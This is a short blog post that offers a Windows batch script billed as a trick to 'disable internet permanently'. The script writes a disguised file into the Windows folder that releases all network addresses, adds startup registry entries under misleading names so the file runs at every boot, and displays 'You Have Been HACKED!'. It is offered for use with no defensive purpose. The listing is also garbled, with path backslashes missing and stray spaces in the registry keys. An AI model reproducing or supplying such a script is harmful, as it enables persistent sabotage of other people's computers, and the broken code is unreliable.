Unordered List

Friday, August 17, 2012

Disable Internet Permanently With Notepad



This is new trick to disable internet permanently in your computer. After it’s running you cannot use internet .


Copy below code and paste in Notepad.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save as like a .bat file.

                 eg:entertainer001.bat”.





..........................................END......................................... 

0 comments:

Post a Comment